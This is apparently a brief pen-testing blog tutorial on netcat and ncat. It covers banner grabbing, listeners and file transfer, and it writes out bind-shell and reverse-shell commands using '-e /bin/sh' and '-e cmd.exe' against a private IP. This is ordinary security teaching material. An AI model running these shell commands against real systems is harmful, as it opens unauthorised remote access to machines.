October 29, 2019 · Basic Pen-Testing
Essential Tools - netcat & ncat (Part I)
Netcat
- Can connect in both TCP/UDP port
- Read service banner
- Connect to service manually
Basic Usage
Connect to POP3, suppres name/port resolutions, show all verbose response
nc -nv 10.0.0.1 110 # -n surpress default port resolution, -v verbose
Listen at localhost:4444 as Server
nc -lnvp 4444 #-l listen, -p port
# mac version dont need -p flag
nc -lnv 4444
connect to 10.0.0.1:4444 as Client
nc -nv 10.0.0.1 4444
Transfer Files
Listen at localhost:4444 as Server redirect as output
nc -lnvp 4444 > output
Connect to 10.0.0.1:4444 redirect as output
nc -nv 10.0.0.1 4444 < output
Listen as shell
Listen at localhost:4444 as Server & serve as shell
nc -nlvp 4444 -e cmd.exe # windows
nc -nlvp 4444 -e /bin/sh # linux
Connect as client
nc -nv 10.0.0.1 4444
# ls -la for linux example list directory
# dir for windows example list directory
Reverse shell
Listen at localhost:4444 as Server
nc -lnvp 4444 #-l listen, -p port
# mac version dont need -p flag
nc -lnv 4444
connect to 10.0.0.1:4444 as Client
nc -nv 10.0.0.1 4444 -e /bin/sh # set the -e flag on client to redirect output
NCat
- Improved version of netcat with encryption/decryption features
- Pretty much the same, but more secure with
--ssl
flag - more security related features
Ncat is not a pre-installed package in kali & mac, you may install it via apt-get install ncat
or brew install ncat
before continue.
Listen as shell
Listen at localhost:4444 as Server & serve as shell
ncat --ssl -vnlp 4444 -e /bin/sh
Connect as client
ncat -v 10.0.0.1 4444 --ssl
# ls -la for linux example list directory
# dir for windows example list directory